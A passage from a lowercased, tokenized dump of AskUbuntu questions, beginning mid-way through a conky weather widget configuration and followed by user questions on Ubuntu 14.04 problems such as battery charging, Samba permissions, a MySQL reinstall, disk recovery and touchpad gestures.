\ $ { image ~/.conky-weather/assets/button/god-mode/separator-v.png -p 172,177 -s 1x92 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-h.png -p 18,369 -s 232x1 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-h.png -p 18,269 -s 232x1 } \ \ # the days of the forecast # \ $ { color3 } $ { voffset 172 } $ { alignc 77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { color } $ { color3 } $ { voffset -13 } $ { alignc } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { color } $ { color3 } $ { voffset -13 } $ { alignc -77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { color } \ # the temperatures of the forecast # \ $ { color2 } $ { voffset 51 } $ { alignc 77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' } °/ $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' } ° $ { color } $ { color2 } $ { voffset -13 } $ { alignc } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' } °/ $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' } ° $ { color } $ { color2 } $ { voffset -13 } $ { alignc -77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' } °/ $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' } ° $ { color } \ # the `` conditions '' section of the conky # \ $ { goto 36 } $ { voffset -172 } $ { font droid sans : size=36 } $ { color1 } $ { execi 300 grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` temp=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } ° $ { font } $ { color } $ { goto 46 } $ { voffset 14 } $ { font droid sans : size=12 } $ { color1 } $ { execi 300 grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` text=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { font } $ { color } $ { color1 } $ { alignr 52 } $ { voffset -73 } $ { execi 300 grep `` yweather : atmosphere '' ~/.cache/weather.xml | grep -o `` pressure=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { execi 300 grep `` yweather : units '' ~/.cache/weather.xml | grep -o `` pressure=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { color1 } $ { alignr 52 } $ { voffset 7 } $ { execi 300 grep `` yweather : atmosphere '' ~/.cache/weather.xml | grep -o `` humidity=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } % $ { color } $ { color1 } $ { alignr 52 } $ { voffset 7 } $ { execi 300 grep `` yweather : wind '' ~/.cache/weather.xml | grep -o `` speed=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { execi 300 grep `` yweather : units '' ~/.cache/weather.xml | grep -o `` speed=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { color } \ # clock + calendar # \ $ { voffset -117 } $ { font droid sans mono : size=22 } $ { alignc } $ { color2 } $ { time % h : % m } $ { font } $ { color } $ { voffset 4 } $ { font droid sans : size=10 } $ { alignc } $ { color6 } $ { time % a , % b % d } $ { font } $ { color } \ # cpu , memory , uptime , and load graph # \ $ { voffset 294 } $ { goto 40 } $ { color2 } cpu : $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } mem : $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } uptime : $ { color } $ { voffset -47 } $ { alignr 39 } $ { color2 } $ { cpu cpu0 } % $ { color } $ { voffset 4 } $ { alignr 39 } $ { color2 } $ { memperc } % $ { color } $ { voffset 4 } $ { alignr 39 } $ { color2 } $ { uptime_short } $ { color } $ { voffset -47 } $ { alignc } $ { color2 } $ { cpubar 5,36 } $ { color } $ { voffset 4 } $ { alignc } $ { color2 } $ { membar 5,36 } $ { color } $ { voffset 29 } $ { goto 40 } $ { loadgraph 26,190 f9f9f9 f9f9f9 -l } \ # the processes section # \ $ { voffset 26 } $ { goto 40 } $ { color2 } $ { top_mem name 1 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 2 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 3 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 4 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 5 } $ { color } $ { voffset -81 } $ { alignc } $ { color5 } $ { top_mem mem 1 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 2 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 3 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 4 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 5 } % $ { color } $ { voffset -81 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 1 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 2 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 3 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 4 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 5 } $ { color } $ { voffset -104 } $ { goto 40 } $ { color9 } proc $ { color } $ { voffset -13 } $ { alignc } $ { color9 } mem % $ { color } $ { voffset -13 } $ { alignr 39 } $ { color9 } mem $ { color } \ # the network section # \ $ { if_existing /proc/net/route ppp0 } $ { voffset -227 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed ppp0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed ppp0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph ppp0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph ppp0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup ppp0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown ppp0 } $ { else } $ { if_existing /proc/net/route ppp1 } $ { voffset -240 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed ppp1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed ppp1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph ppp1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph ppp1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup ppp1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown ppp1 } $ { else } $ { if_existing /proc/net/route wlp2s1 } $ { voffset -253 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlp2s1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlp2s1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph wlp2s1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlp2s1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlp2s1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlp2s1 } $ { else } $ { if_existing /proc/net/route wlp2s0 } $ { voffset -266 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlp2s0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlp2s0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph wlp2s0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlp2s0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlp2s0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlp2s0 } $ { else } $ { if_existing /proc/net/route wlan0 } $ { voffset -279 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlan0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlan0 } $ { voffset 8 } $ { goto 40 } $ { upspeedgraph wlan0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlan0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlan0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlan0 } $ { else } $ { if_existing /proc/net/route wlan1 } $ { voffset -292 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlan1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlan1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph wlan1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlan1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlan1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlan1 } $ { else } $ { if_existing /proc/net/route eth1 } $ { voffset -305 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed eth1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed eth1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph eth1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph eth1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup eth1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown eth1 } $ { else } $ { if_existing /proc/net/route eth0 } $ { voffset -318 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed eth0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed eth0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph eth0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph eth0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup eth0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown eth0 } $ { else } $ { if_existing /proc/net/route enp0s0 } $ { voffset -331 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed enp0s0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed enp0s0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph enp0s0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph enp0s0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup enp0s0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown enp0s0 } $ { else } $ { if_existing /proc/net/route enp0s1 } $ { voffset -344 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed enp0s1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed enp0s1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph enp0s1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph enp0s1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup enp0s1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown enp0s1 } $ { else } $ { voffset -311 } $ { goto 40 } $ { color5 } network disconnected $ { color } $ { image ~/.conky-weather/assets/button/god-mode/offline.png -p 44,284 -s 16x16 } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } \ # various images including the icons of the forecast # \ $ { image ~/.conky-weather/assets/button/god-mode/pressure2.png -p 224,95 -s 16x16 } \ $ { image ~/.conky-weather/assets/button/god-mode/humidity2.png -p 224,115 -s 16x16 } \ $ { image ~/.conky-weather/assets/button/god-mode/wind.png -p 224,136 -s 16x16 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-icons-light/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' ) .png ~/.cache/weather-1.png } $ { image ~/.cache/weather-1.png -p 41,207 -s 32x32 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-icons-light/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' ) .png ~/.cache/weather-2.png } $ { image ~/.cache/weather-2.png -p 119,207 -s 32x32 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-icons-light/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' ) .png ~/.cache/weather-3.png } $ { image ~/.cache/weather-3.png -p 195,207 -s 32x32 } $ { font } $ { voffset -120 } \ edit 3 : here 's what i get with removing own_window_transparent yes and giving own_window_argb_value `` 200 '' it now has the black border . i am ultimately trying to get a legible `` widget '' without the black border.if i change the settings to get rid of the black border , then the picture change on desktop locks into first desktop image as border ( instead of black )
482492	laptop battery sometimes does not charge ?	so on my asus k56c laptop running ubuntu 14.04 ( was same problem in 13.10 ) i got a problem that from time to time after i use laptop without cable ( just on battery ) it stops charging with cable . i can still use laptop indefinitely on cable , but it 's not charging . the only solution is to remove and reinsert the battery , then it will charge . now i wonder how does laptop 'knows ' that battery was reinserted , and is it possible to simulate that from ubuntu , maybe some command which refreshes battery ? p.s . : this is not happening on windows 8.1 .
482493	samba user does not have folder read permission	i have set up a special user for read only samba shares . i set him up in samba and as a system user . i shared a couple of folders but that user can not access them . i know samba is working because i also shared them with the main user of the system which is an admin account and it works fine . how can i allow this user to have read permissions on all the directories i want to share without changing anything for any other users of the system ? for example , i do n't want to give him ownership of any of the files/directories . just ongoing recursive read access . ongoing recursive is important . if someone adds a file or directory , i still want him to automatically be able to read it .
482503	ca n't get the shared clipboard to work on ubuntu 14.04	i 'm working on a vm that i 've recently updated to the 14.04lts . although the guest additions are installed , the support for both clipboard and drag and drop is set to bidirectional , when my mouse over the vm i ca n't see the cursor nor i ca n't copy and paste in both directions as expected . i 'm using the server edition without any gui installed . any idea ?
482507	can not install/start mysql server	okay , i decided to migrate from mysql server 5.5.37 to percona server 5.6 . i ended up removing mysql server by the following : sudo apt-get -- purge remove mysql-server mysql-server-5.5 mysql-server-core-5.5 mysql-client mysql-client-core-5.5 mysql-common sudo apt-get autoremove sudo apt-get autoclean rm -rf /var/lib/mysql rm -rf /etc/mysql now here is my problem , when i try to install mysql server 5.6 it goes through its process and when it asks me for a password , it comes up with can not set mysql `` root '' password . after it `` installs '' mysql wont start up and i get permission denied ? . reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 35 not upgraded . brandon @ brandon-db : ~ $ sudo apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libdbd-mysql-perl libdbi-perl libmysqlclient18 libterm-readkey-perl mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server-5.5 mysql-server-core-5.5 suggested packages : libmldbm-perl libnet-daemon-perl libplrpc-perl libsql-statement-perl tinyca mailx the following new packages will be installed : libdbd-mysql-perl libdbi-perl libmysqlclient18 libterm-readkey-perl mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server mysql-server-5.5 mysql-server-core-5.5 0 upgraded , 10 newly installed , 0 to remove and 35 not upgraded . need to get 0 b/8,955 kb of archives . after this operation , 96.3 mb of additional disk space will be used . do you want to continue ? [ y/n ] y preconfiguring packages ... selecting previously unselected package mysql-common . ( reading database ... 167760 files and directories currently installed . ) preparing to unpack ... /mysql-common_5.5.37-0ubuntu0.14.04.1_all.deb ... unpacking mysql-common ( 5.5.37-0ubuntu0.14.04.1 ) ... selecting previously unselected package libmysqlclient18 : amd64 . preparing to unpack ... /libmysqlclient18_5.5.37-0ubuntu0.14.04.1_amd64.deb ... unpacking libmysqlclient18 : amd64 ( 5.5.37-0ubuntu0.14.04.1 ) ... selecting previously unselected package libdbi-perl . preparing to unpack ... /libdbi-perl_1.630-1_amd64.deb ... unpacking libdbi-perl ( 1.630-1 ) ... selecting previously unselected package libdbd-mysql-perl . preparing to unpack ... /libdbd-mysql-perl_4.025-1_amd64.deb ... unpacking libdbd-mysql-perl ( 4.025-1 ) ... selecting previously unselected package libterm-readkey-perl . preparing to unpack ... /libterm-readkey-perl_2.31-1_amd64.deb ... unpacking libterm-readkey-perl ( 2.31-1 ) ... selecting previously unselected package mysql-client-core-5.5 . preparing to unpack ... /mysql-client-core-5.5_5.5.37-0ubuntu0.14.04.1_amd64.deb ... unpacking mysql-client-core-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... selecting previously unselected package mysql-client-5.5 . preparing to unpack ... /mysql-client-5.5_5.5.37-0ubuntu0.14.04.1_amd64.deb ... unpacking mysql-client-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... selecting previously unselected package mysql-server-core-5.5 . preparing to unpack ... /mysql-server-core-5.5_5.5.37-0ubuntu0.14.04.1_amd64.deb ... unpacking mysql-server-core-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up mysql-common ( 5.5.37-0ubuntu0.14.04.1 ) ... selecting previously unselected package mysql-server-5.5 . ( reading database ... 168116 files and directories currently installed . ) preparing to unpack ... /mysql-server-5.5_5.5.37-0ubuntu0.14.04.1_amd64.deb ... unpacking mysql-server-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... selecting previously unselected package mysql-server . preparing to unpack ... /mysql-server_5.5.37-0ubuntu0.14.04.1_all.deb ... unpacking mysql-server ( 5.5.37-0ubuntu0.14.04.1 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up libmysqlclient18 : amd64 ( 5.5.37-0ubuntu0.14.04.1 ) ... setting up libdbi-perl ( 1.630-1 ) ... setting up libdbd-mysql-perl ( 4.025-1 ) ... setting up libterm-readkey-perl ( 2.31-1 ) ... setting up mysql-client-core-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... setting up mysql-client-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... setting up mysql-server-core-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... setting up mysql-server-5.5 ( 5.5.37-0ubuntu0.14.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing package mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing package mysql-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... no apport report written because the error message indicates its a followup error from a previous failure . processing triggers for ureadahead ( 0.100.0-16 ) ... errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have all my database/tables dumped and on a seperate hdd . this is also a dev machine and not my main production machine . i also backed up the mysql_config and mysql_data . edit : i was able to get mysql server 5.6 installed on my machine !
482508	pwmconfig : `` there are no pwm-capable sensor modules installed ''	i 'm trying to reduce my fan speed with fancontrol and pwmanager because , despite the temperatures being the same , they are much louder on linux ( ubuntu gnome 14.04 ) than on windows . i 've followed the instructions in the first answer here but when running pwmanager i get pwmconfig : `` there are no pwm-capable sensor modules installed '' i know that my system has working thermal sensors because psensor has no trouble telling me my cpu temp and gpu temp . i would appreciate any help you can give in helping me reduce my fan speed to that of windows ( which uses the asus ai suite 3 software ) . the motherboard is an asus z87-a , if that helps .
482512	audio works only when microphone does not- issue with headset	i recently bought a plantronics .audio 655 usb multimedia headset . i downloaded the necessary updates for the headset on a windows computer . the headset worked well on that computer , as both the microphone and audio functioned . when the headset was used on a linux computer the first time , i found that the microphone worked briefly ( several seconds ) then stopped . only the audio worked . i unplugged the headset and inserted it in another usb port . again , both the microphone and audio worked briefly , but then the audio stopped . is there a way to fix this ? thank you for any help in advance . specifications os : ubuntu 14.04 amd64 memory : 6gb graphics : intel® sandybridge mobile processor : intel® core™ i5-2430m cpu @ 2.40ghz × 4
482516	is qcma secure for my ubuntu 14.04 ?	i actually have a psvita device , and it have a content assistan manager program ( cma ) , to manage the content of the console ( games , photo ... ) . for linux , sony did n't do an app for the psvita , and recently i installed a program called qcma made for the linux user that own a psvita . i want to know if that program its secure . here is the source code and repositories : sudo add-apt-repository ppa : codestation404/qcma sudo apt-get update sudo apt-get install qcma https : //github.com/codestation/qcma http : //wololo.net/talk/viewtopic.php ? t=34677 !
482523	mouse movement + key press = scroll	i would find it very , very nice if i could obtain scroll functionality ( vertical is most important ) by moving my mouse , say , up and down while holding down a key . i know scroll is normally obtained by mouse button presses 4 and 5 , but i do n't have those keys . can i map mouse movement + key press to obtain them ? any other suggestions to the same effect would also be very welcome .
482524	able to connect to wap , but can not connect to internet .	i have installed a new copy of ubuntu 14.04 . after installation , i am able to connect to the wireless network easily . and the wireless icon also shows connected . but , when i try to open any website , it does n't open . and one more thing , it does n't give error directly but continues to try to connect to the host . after some time , it fails to connect . what steps do i need to take to troubleshoot/fix this problem ?
482525	partitions ca n't be recovered , disk is to small . can i get my data ?	i 've caused myself a lot of headache with this and could use a hand of an expert . with dd i managed to write my 6 gib ( or so ) image onto hdd that held this very image screwing up src and dest file . i was using testdisk back and forth to repair the damage but only gotten things worse . at some point the drive didnt wont mount so i pulled some tricks that some nice guy point me to : hdd wo n't mount [ solved ] now i 'm at begining and testdisk is unappealing on this . this is result from deeper search . disk /dev/sda - 500 gb / 465 gib - chs 60801 255 63 the harddisk ( 500 gb / 465 gib ) seems too small ! ( < 2098 gb / 1954 gib ) check the harddisk size : hd jumpers settings , bios detection ... the following partitions ca n't be recovered : partition start end size in sectors > linux 30051 123 25 90331 3 40 968390656 linux 30053 3 31 90332 138 46 968390656 linux 30055 208 42 90335 88 57 968390656 hpfs - ntfs 228194 8 18 255139 3 24 432871117 [ continue ] ext4 blocksize=4096 large file sparse superblock recover , 495 gb / 461 gib i dont know what next step should be . i ran thru lot of forums but ca n't link things together since every problem is unique in its own way . there are just too many numbers i ca n't figure out .
482527	debian packaging dependencies checking	how to force a debian package to check some dependency installed ?
482529	conversion of disk image from encase ( e01 ) to raw format	i am trying to convert from encase to raw format using instructions given on this page . the following takes place : manu @ ubuntu : ~/downloads $ ewfexport nps-2010-emails.e01 the program 'ewfexport ' is currently not installed . you can install it by typing : sudo apt-get install ewf-tools manu @ ubuntu : ~/downloads $ sudo apt-get install ewf-tools [ sudo ] password for manu : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : ewf-tools 0 upgraded , 1 newly installed , 0 to remove and 503 not upgraded . need to get 162 kb of archives . after this operation , 438 kb of additional disk space will be used . get:1 http : //archive.ubuntu.com/ubuntu/ quantal/universe ewf-tools amd64 20100226-1build2 [ 162 kb ] fetched 162 kb in 2s ( 65.7 kb/s ) selecting previously unselected package ewf-tools . ( reading database ... 158500 files and directories currently installed . ) unpacking ewf-tools ( from ... /ewf-tools_20100226-1build2_amd64.deb ) ... processing triggers for man-db ... setting up ewf-tools ( 20100226-1build2 ) ... manu @ ubuntu : ~/downloads $ ewfexport nps-2010-emails.e01 ewfexport 20100226 ( libewf 20100226 , libuna 20091031 , libbfio 20091114 , zlib 1.2.3.4 , libcrypto 1.0.0 , libuuid ) information for export required , please provide the necessary input export to file format ( raw , ewf , smart , ftk , encase1 , encase2 , encase3 , encase4 , encase5 , encase6 , linen5 , linen6 , ewfx ) [ raw ] : raw target path and filename with extension or - for stdout : /user/manu/downloads nps start export at offset ( 0 > = value > = 10485760 ) [ 0 ] : 0 amount of bytes to export ( 0 > = value > = 10485760 ) [ 10485760 ] : export started at : fri jun 13 02:54:12 2014 this could take a while . unable to open output . export_handle_open_output : unable to open file : /user/manu/downloads nps . i had to copy and paste from the terminal , as i am a newbie , i am not allowed to post more than two links or any pictures . this question is very important as it is required for the summer intern i am currently pursuing . please help me to understand the intermediate prompt messages and to convert the file from encase to raw format . the digital corpus ( the encase file ) is downloaded from digital corpora .
482531	touchegg recognizes anything on ubuntu 14.04	i 'm francesco and i 'm new to linux . i 've tried for two days but i did n't make touchegg works . i 've an acer 5750g laptop with ubuntu 14.04 and cinnamon 2.2.13 enviroment ( touchegg does n't work with any environment on my pc ) . i installed touchegg from the software center , edited the touchegg.conf , disabled the synclient two finger features but touchegg does n't even recognizes a tap . touchegg.conf < touchégg > < settings > < property name= '' composed_gestures_time '' > 111 < /property > < /settings > < application name= '' all '' > < gesture type= '' drag '' fingers= '' 1 '' direction= '' all '' > < action type= '' drag_and_drop '' > button=1 < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' right '' > < action type= '' move_window '' > < /action > < /gesture > < gesture type= '' drag '' fingers= '' 2 '' direction= '' all '' > < action type= '' scroll '' > speed=7 : inverted=true < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' left '' > < action type= '' move_window '' > < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' up '' > < action type= '' maximize_restore_window '' > < /action > < /gesture > < gesture type= '' tap '' fingers= '' 5 '' direction= '' '' > < action type= '' close_window '' > < /action > < /gesture > < gesture type= '' pinch '' fingers= '' 5 '' direction= '' all '' > < action type= '' send_keys '' > alt+f1 < /action > < /gesture > < gesture type= '' drag '' fingers= '' 4 '' direction= '' up '' > < action type= '' send_keys '' > super+w < /action > < /gesture > < gesture type= '' tap '' fingers= '' 4 '' direction= '' '' > < action type= '' run_command '' > vlc < /action > < /gesture > < gesture type= '' drag '' fingers= '' 4 '' direction= '' down '' > < action type= '' show_desktop '' > < /action > < /gesture > < gesture type= '' tap '' fingers= '' 3 '' direction= '' '' > < action type= '' mouse_click '' > button=2 < /action > < /gesture > < gesture type= '' tap '' fingers= '' 2 '' direction= '' '' > < action type= '' mouse_click '' > button=3 < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' down '' > < action type= '' minimize_window '' > < /action > < /gesture > < gesture type= '' tap '' fingers= '' 1 '' direction= '' '' > < action type= '' mouse_click '' > button=1 < /action > < /gesture > < /application > < application name= '' okular , gwenview '' > < gesture type= '' rotate '' fingers= '' 2 '' direction= '' left '' > < action type= '' send_keys '' > control+l < /action > < /gesture > < gesture type= '' pinch '' fingers= '' 2 '' direction= '' in '' > < action type= '' send_keys '' > control+kp_add < /action > < /gesture > < gesture type= '' pinch '' fingers= '' 2 '' direction= '' out '' > < action type= '' send_keys '' > control+kp_subtract < /action > < /gesture > < gesture type= '' rotate '' fingers= '' 2 '' direction= '' right '' > < action type= '' send_keys '' > control+r < /action > < /gesture > < /application > < application name= '' dolphin , chromium-browser '' > < gesture type= '' drag '' fingers= '' 2 '' direction= '' right '' > < action type= '' send_keys '' > alt+right < /action > < /gesture > < gesture type= '' drag '' fingers= '' 2 '' direction= '' left '' > < action type= '' send_keys '' > alt+left < /action > < /gesture > < /application > < /touchégg > thanks for help !
